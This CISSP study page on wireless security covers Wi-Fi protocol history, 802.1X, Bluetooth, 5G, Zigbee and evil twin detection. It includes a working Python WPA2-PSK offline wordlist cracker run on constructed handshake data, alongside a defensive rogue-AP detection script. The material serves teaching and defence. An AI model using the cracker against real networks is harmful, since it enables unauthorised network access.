Wireless networking has evolved from a convenience technology to the primary connectivity method for most endpoints in modern organisations. The CISSP exam tests wireless security across multiple technologies: the Wi-Fi security protocol evolution, Bluetooth vulnerabilities, 5G architecture changes, IoT wireless protocols, and the detection of wireless attacks. Each technology has distinct vulnerabilities and controls that the exam tests in scenario form.
WEP to WPA3: The Security Protocol Evolution
Understanding why each generation of Wi-Fi security was replaced is more important for the exam than memorising technical details. Each protocol's successor addressed the specific vulnerabilities that made its predecessor insecure.
Wired Equivalent Privacy (WEP) was introduced in 1997 as the first Wi-Fi security protocol. It used the RC4 stream cipher with a 40-bit (later 104-bit) key combined with a 24-bit Initialization Vector (IV). WEP was fundamentally broken by 2001. The 24-bit IV space (about 16.7 million values) is exhausted within hours on a busy network, so IVs and therefore RC4 keystreams repeat; collecting enough packets encrypted under related keystreams lets an attacker recover the key with statistical attacks (the FMS attack of 2001 and its successors). Additionally, WEP used CRC-32 for integrity, which is not a cryptographic MAC: because CRC-32 is linear, an attacker can flip bits in an encrypted packet and correct the encrypted checksum without knowing the key. WEP is completely broken and can be cracked in minutes with freely available tools. It should never be used.
Wi-Fi Protected Access (WPA) was introduced in 2003 as an interim improvement while the full 802.11i standard was developed. WPA used TKIP (Temporal Key Integrity Protocol), which kept RC4 so that it could run on WEP-era hardware but mixed a fresh per-packet key from the session key and a 48-bit sequence counter, eliminating WEP's keystream reuse. WPA also added a MIC (Message Integrity Code, the Michael algorithm) to replace WEP's broken CRC. However, TKIP was itself found vulnerable (the Beck-Tews attack of 2008 and later work), and WPA is now deprecated.
WPA2, introduced in 2004, implemented the full 802.11i standard. It replaced RC4/TKIP with AES-CCMP (AES in Counter Mode with CBC-MAC Protocol), which provides both confidentiality and integrity from a single strong cipher. WPA2 remained the standard for over a decade. WPA2-Personal (PSK) uses a pre-shared passphrase for authentication: the Pairwise Master Key is derived deterministically from the passphrase and the SSID, and the 4-way handshake that follows proves possession of it. Because every value needed to verify a guess is visible in that handshake, anyone who captures it can test passphrase guesses offline, without any further interaction with the network. WPA2-Enterprise uses 802.1X with RADIUS for individual user authentication; each user authenticates with their own credentials rather than a shared passphrase, and the master key is unique per session. WPA2 is also vulnerable to KRACK (Key Reinstallation Attack), disclosed in 2017: an attacker within radio range replays handshake messages to force nonce reuse in the client. KRACK does not recover the passphrase, needs radio proximity rather than network credentials, and has largely been patched in client and AP software.
WPA3, introduced in 2018, addresses WPA2's key weaknesses. WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals, also called Dragonfly), a password-authenticated key exchange that is resistant to offline dictionary attacks: a captured handshake gives an attacker nothing to test guesses against, so the only option is online guessing, one attempt per exchange, which the AP can rate-limit. WPA3 also provides forward secrecy for personal networks, so a passphrase learned later does not decrypt previously captured traffic. WPA3-Enterprise adds an optional 192-bit security mode (CNSA suite). Enhanced Open (OWE, Opportunistic Wireless Encryption), a companion certification, provides encryption for open networks without requiring a password. One caveat: WPA3-Personal transition mode accepts WPA2-PSK clients on the same SSID, and those clients' handshakes remain attackable offline until transition mode is turned off.
For the exam: WEP is broken (IV reuse, weak RC4). WPA used TKIP (improvement but deprecated). WPA2 uses AES-CCMP (strong but PSK vulnerable to offline attacks). WPA3 uses SAE (resistant to offline dictionary attacks). WPA2-Enterprise with 802.1X is preferred over WPA2-Personal (PSK) for enterprise environments.
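The offline attack against WPA2-PSK can be made concrete. The following Python is an added example, not code from the page: it implements the 802.11i derivations (PBKDF2 from passphrase and SSID to the PMK, PRF-384 to the PTK, HMAC-SHA1 to the EAPOL-Key MIC) and uses them to test a wordlist against one captured handshake. The SSID, MAC addresses, nonces, EAPOL-Key frame and wordlist are constructed for illustration; a real attack would parse those fields from a pcap.

```python
"""Why a captured WPA2-PSK 4-way handshake allows offline passphrase guessing.

Added example, not code from the page: the 802.11i key schedule
(PBKDF2 -> PMK, PRF-384 -> PTK, HMAC-SHA1 -> EAPOL MIC) applied to one
captured handshake. SSID, MACs, nonces, EAPOL frame and wordlist are
constructed; a real attack would parse them from a pcap.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    # CCMP PTK is 48 bytes: KCK (16) | KEK (16) | TK (16)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (PSK with AES-CCMP): MIC = HMAC-SHA1(KCK, frame)[:16].
    eapol_frame is the EAPOL-Key frame with its 16-byte MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# ---- constructed "capture" (stand-in for fields parsed from a pcap) ----
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122aabb03")       # constructed
CLIENT_MAC = bytes.fromhex("66778899ccdd")   # constructed
ANONCE = bytes(range(32))                    # constructed; real nonces are random
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 with the MIC field zeroed: EAPOL header (version 1, type 3,
# body length 0x5f), descriptor type 2, key info 0x010a (MIC | Pairwise | version 2),
# key length, replay counter 1, SNonce, key IV, RSC, key ID, MIC, key data length 0.
EAPOL_MSG2 = (b"\x01\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x00"
              + b"\x00" * 7 + b"\x01" + SNONCE + b"\x00" * 16 + b"\x00" * 8
              + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")


def make_capture(true_passphrase: str) -> dict:
    """Produce the MIC the real client would have sent for the constructed frame."""
    pmk = pmk_from_passphrase(true_passphrase, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_MSG2,
            "mic": eapol_mic(ptk[:16], EAPOL_MSG2)}


def crack(capture: dict, wordlist):
    """Offline attack: every value needed to verify a guess is in the capture.
    The cost per guess is one 4096-round PBKDF2, which is what GPU crackers
    accelerate. Returns the matching passphrase or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["client_mac"],
                           capture["anonce"], capture["snonce"])
        if eapol_mic(ptk[:16], capture["eapol"]) == capture["mic"]:
            return candidate
    return None


WORDLIST = ["password", "letmein", "corpguest", "Welcome1!", "qwerty123"]  # constructed

if __name__ == "__main__":
    cap = make_capture("Welcome1!")
    print("recovered passphrase:", crack(cap, WORDLIST))
```

Note that nothing in `crack` talks to the network: the handshake is captured once and the passphrase is the only unknown. SAE removes this property because checking a guess requires a live exchange with the AP, so a recorded transcript cannot be replayed against a wordlist.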
802.1X: Enterprise Wireless Authentication
802.1X is a port-based network access control standard that provides authenticated access to networks. In wireless contexts, it is used with WPA2-Enterprise and WPA3-Enterprise to provide per-user authentication using RADIUS.
The 802.1X architecture has three components: the supplicant (the client device seeking access), the authenticator (the wireless access point or controller), and the authentication server (the RADIUS server). When a client connects, the AP opens the port only for EAP (Extensible Authentication Protocol) traffic and relays the EAP messages between the client and the RADIUS server. The RADIUS server verifies the client's credentials (certificate, username/password, or another EAP method) and grants or denies access; on success it returns session key material to the AP, so each client derives its own encryption keys. Two practitioner checks matter here: EAP-TLS with client certificates is the strongest method, and with tunnelled methods such as PEAP or EAP-TTLS the supplicant must be configured to validate the RADIUS server's certificate, because a client that accepts any server certificate will hand its credentials (or an MSCHAPv2 challenge/response) to an evil twin running its own RADIUS server.
For the exam: 802.1X with RADIUS is the enterprise wireless authentication standard. It is preferred over PSK because each user authenticates individually: if one user's credentials are compromised, only that user's account needs to be disabled, whereas a leaked PSK requires rekeying every device on the network.
Bluetooth Vulnerabilities
Bluetooth is a short-range wireless protocol for personal-area connections between devices such as phones, headsets and peripherals; devices are paired before they exchange data. The exam tests three specific Bluetooth attack types.
Bluejacking is the sending of unsolicited messages to a Bluetooth device. It does not steal data — it sends data. The attacker uses the Bluetooth contact name field to send messages to discoverable Bluetooth devices in range. Bluejacking is a nuisance attack rather than a security breach.
Bluesnarfing is the unauthorised access to information on a Bluetooth device. An attacker exploits a vulnerability in the OBEX (OBject EXchange) protocol to access the target's contact list, calendar, emails, text messages, and other data without the device owner's knowledge or consent. Bluesnarfing is a genuine security attack that can result in data theft.
Bluebugging is a more sophisticated attack that gives the attacker control over the target device's Bluetooth-reachable functions, including making phone calls, sending text messages, and accessing data. Bluebugging typically requires the device to be in discoverable mode and exploits flaws in the device's Bluetooth stack (classically, unauthenticated access to the modem's AT command interface on older phones).
For the exam: Bluejacking sends messages (nuisance). Bluesnarfing steals data. Bluebugging provides device control. All three require the attacker to be within Bluetooth range (typically 10-100 metres).
5G Security Architecture vs 4G LTE
5G introduces significant changes to mobile network security compared to 4G LTE. The CISSP exam expects awareness of the key security improvements and new concerns.
Security improvements in 5G: stronger authentication (the 5G-AKA protocol, in which the home network takes part in confirming the authentication result), more comprehensive encryption (applied earlier in connection setup than in 4G), network slicing security (multiple logical network slices, each with its own security policies), and improved subscriber identity protection: the SUPI (Subscription Permanent Identifier) is never sent in the clear but is encrypted with the home network's public key into a SUCI (Subscription Concealed Identifier), unlike the 4G IMSI, which is transmitted in plaintext on initial attach and can be captured by IMSI catchers (Stingrays).
New 5G security concerns: expanded attack surface (5G's reliance on software-defined networking and virtualised network functions increases exposure to software vulnerabilities), supply chain risk (concerns about components from specific vendors with potential nation-state connections), and IoT proliferation (5G's massive machine type communications capability enables billions of IoT devices, many of which will have minimal security).
Zigbee and IoT Wireless Protocol Risks
Zigbee is a low-power wireless protocol built on IEEE 802.15.4 and designed for IoT devices. It operates mainly in the 2.4 GHz band (shared with Wi-Fi and Bluetooth), with regional sub-GHz bands also defined, and uses mesh networking. Common applications include smart home devices, industrial sensors, and medical devices.
Zigbee security concerns: the protocol supports AES-128 (CCM mode) encryption, but many implementations use weak or default keys. The best-known example is the default global Trust Center link key "ZigBeeAlliance09": when a device joins using that key, the network key is transported to it encrypted under a key that is public knowledge, so anyone sniffing the join obtains the network key. Zigbee networks can also be vulnerable to key extraction from physically captured devices, replay attacks, and denial of service through channel jamming. The low-power constraint of many Zigbee devices limits the cryptographic operations they can perform.
For the exam: IoT wireless protocols like Zigbee prioritise power efficiency over security. Proper IoT security requires network segmentation, firmware updates, and replacing default keys.
Rogue Access Points and Evil Twin Attacks
A rogue access point is an unauthorised wireless AP connected to the corporate network — typically installed by an employee for convenience without IT approval. Rogue APs bypass wireless security controls and can provide unauthorised network access.
An evil twin attack deploys an attacker-controlled AP with the same SSID as a legitimate network. Devices may automatically connect to the evil twin (especially if it has a stronger signal), allowing the attacker to intercept the victim's wireless traffic. This is a man-in-the-middle attack at the wireless layer. Traffic protected by TLS stays encrypted, but the attacker sees DNS queries and any plaintext protocols, can present a captive portal to harvest credentials, and can pair the evil twin with a rogue RADIUS server to capture enterprise credentials from supplicants that do not validate the server certificate. Attackers often combine the evil twin with spoofed deauthentication frames to push clients off the legitimate AP.
Detection: wireless intrusion detection/prevention systems (WIDS/WIPS) compare the APs their sensors observe against an inventory of authorised BSSIDs, flag unknown APs broadcasting corporate SSIDs or an authorised BSSID appearing on an unexpected channel or with the wrong security type, and can automatically contain rogue and evil twin APs by sending deauthentication frames to their clients. Note that 802.11w Protected Management Frames (mandatory in WPA3) authenticate deauthentication frames; this defeats attacker deauth floods but equally blunts deauth-based containment against a PMF-protected rogue, so wired-side detection (unexpected MAC addresses on switch ports) remains important.
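A minimal version of the WIDS inventory check, as an added Python example that is not part of the original page: it parses a constructed scan listing, compares each beacon against an inventory of authorised BSSIDs, and flags three conditions: an unknown BSSID advertising a corporate SSID (evil twin), an authorised BSSID advertising the wrong security type (a spoofed BSSID or downgrade), and an authorised BSSID seen on two channels at once (a clone that copied the security configuration exactly). The inventory, the scan rows and the CSV column layout are all constructed for illustration.

```python
"""Evil twin / rogue AP detection over a constructed scan result.

Added example, not code from the page: a minimal WIDS check that compares
observed beacons against an inventory of authorised APs. The inventory,
the scan rows and the column layout are constructed; a real WIDS would
feed this from its sensors or from a scanning tool's export.
"""
import csv
import io

# Authorised BSSIDs per corporate SSID and the security each must advertise (constructed).
INVENTORY = {
    "CorpWiFi": {"bssids": {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}, "security": "WPA2-EAP"},
    "CorpGuest": {"bssids": {"00:11:22:aa:bb:03"}, "security": "WPA3-SAE"},
}

# Constructed scan listing: one beacon per row.
SCAN_CSV = """bssid,channel,security,essid,signal_dbm
00:11:22:aa:bb:01,36,WPA2-EAP,CorpWiFi,-52
00:11:22:aa:bb:02,149,WPA2-EAP,CorpWiFi,-60
00:11:22:aa:bb:02,6,WPA2-EAP,CorpWiFi,-38
de:ad:be:ef:00:01,6,WPA2-EAP,CorpWiFi,-35
00:11:22:aa:bb:03,1,WPA3-SAE,CorpGuest,-58
00:11:22:aa:bb:03,1,OPN,CorpGuest,-40
c0:ff:ee:00:00:01,11,WPA2-PSK,Neighbor5G,-80
"""


def parse_scan(text: str) -> list:
    """Rows as dicts keyed by the header line."""
    return list(csv.DictReader(io.StringIO(text)))


def classify(row: dict, inventory: dict):
    """Per-beacon rules. Returns (kind, essid, bssid, detail) or None."""
    essid = row["essid"]
    if essid not in inventory:
        return None  # foreign SSID: neither ours nor impersonating us
    expected = inventory[essid]
    bssid = row["bssid"].lower()
    if bssid not in expected["bssids"]:
        # Someone else is beaconing our SSID: classic evil twin.
        return ("evil-twin", essid, bssid, f"unknown BSSID on channel {row['channel']}")
    if row["security"] != expected["security"]:
        # Our BSSID, but the wrong security: a spoofed BSSID or downgrade lure.
        return ("bssid-spoof", essid, bssid,
                f"advertises {row['security']}, expected {expected['security']}")
    return None


def detect(rows: list, inventory: dict) -> list:
    """Run the per-beacon rules, then the cross-beacon clone rule."""
    alerts = []
    channels_by_bssid = {}
    for row in rows:
        alert = classify(row, inventory)
        if alert:
            alerts.append(alert)
        channels_by_bssid.setdefault(row["bssid"].lower(), set()).add(row["channel"])
    # An authorised BSSID beaconing on two channels at once is a clone, even when
    # the impostor copied the SSID and security configuration exactly.
    for essid, expected in inventory.items():
        for bssid in sorted(expected["bssids"]):
            chans = channels_by_bssid.get(bssid, set())
            if len(chans) > 1:
                alerts.append(("bssid-clone", essid, bssid,
                               "seen on channels " + ",".join(sorted(chans, key=int))))
    return alerts


if __name__ == "__main__":
    for kind, essid, bssid, detail in detect(parse_scan(SCAN_CSV), INVENTORY):
        print(f"{kind:12} {essid:10} {bssid}  {detail}")
```

The inventory is the control here: without an authoritative list of BSSIDs per SSID the sensor cannot tell a legitimate AP from a twin. The rules above see only the air; a rogue AP plugged into a wall port by an employee looks legitimate from the radio side and is found by correlating its MAC address with switch port tables.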
Exam Tip
WPA2-Enterprise with 802.1X is preferred over WPA2-Personal (PSK) for enterprise environments. PSK is a shared secret — if one person knows it, everyone on that network is potentially exposed. 802.1X provides per-user authentication with individual accountability. For Bluetooth: bluejacking is harmless (sends messages), bluesnarfing steals data, bluebugging gives full control. WPA3-SAE is resistant to offline dictionary attacks that defeat WPA2-PSK.